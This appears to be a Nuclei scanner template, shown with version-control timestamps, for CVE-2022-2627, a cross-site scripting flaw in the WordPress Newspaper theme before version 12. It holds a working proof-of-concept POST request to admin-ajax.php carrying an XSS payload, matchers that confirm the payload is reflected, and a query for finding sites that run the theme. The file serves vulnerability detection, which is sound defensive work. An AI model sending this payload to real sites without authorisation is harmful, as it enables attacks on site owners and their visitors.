2022-11-18 23:06:23 +00:00
id : CVE-2022-2627
info :
2023-09-01 08:34:34 +00:00
name : WordPress Newspaper < 12 - Cross-Site Scripting
author : ramondunker,c4sper0
2022-11-18 23:06:23 +00:00
severity : medium
2022-11-20 12:33:17 +00:00
description : |
2023-04-13 15:50:14 +00:00
WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
2023-09-01 08:55:18 +00:00
remediation : Fixed in version 12
2022-11-20 12:33:17 +00:00
reference :
- https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea
2023-03-28 13:46:04 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2627
2022-11-18 23:06:23 +00:00
classification :
2023-04-01 13:43:32 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-11-20 12:33:17 +00:00
cve-id : CVE-2022-2627
2023-04-01 13:43:32 +00:00
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00078
2023-10-25 17:36:19 +00:00
epss-percentile : 0.32841
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
2023-09-01 08:55:18 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : tagdiv
product : newspaper
2023-09-06 11:59:08 +00:00
framework : wordpress
publicwww-query : "/wp-content/themes/Newspaper"
2023-07-11 19:49:27 +00:00
tags : xss,wordpress,wp,wp-theme,newspaper,wpscan,cve,cve2022
2022-11-18 23:06:23 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-11-20 12:33:17 +00:00
- raw :
- |
2023-09-01 08:34:34 +00:00
POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1
2022-11-20 12:33:17 +00:00
Host : {{Hostname}}
2023-09-01 08:34:34 +00:00
Content-Type : application/x-www-form-urlencoded
2022-11-18 23:06:23 +00:00
2023-09-01 08:34:34 +00:00
action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=
payloads :
xss_payload :
- "<form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"
2022-11-18 23:06:23 +00:00
2022-11-20 12:33:17 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-09-01 08:34:34 +00:00
- <form><math><img onerror=alert(document.domain) src=1><mtext>
- td-block-
2023-07-11 19:49:27 +00:00
condition : and
2022-11-20 12:33:17 +00:00
2023-09-01 08:55:18 +00:00
- type : word
part : header
words :
- text/html
2022-11-20 12:33:17 +00:00
- type : status
status :
- 200
2023-10-25 12:04:43 +00:00
# digest: 490a004630440220038525cedac2ab2c5af1b84d3a28fab8c6949f6c6787f53f7be9cfc18072b1ea02203864b52cf2e50a3e87715d915a6ebdd7e45944acd64ee536b31f519ea681a054:922c64590222798bb761d5b6d8e72950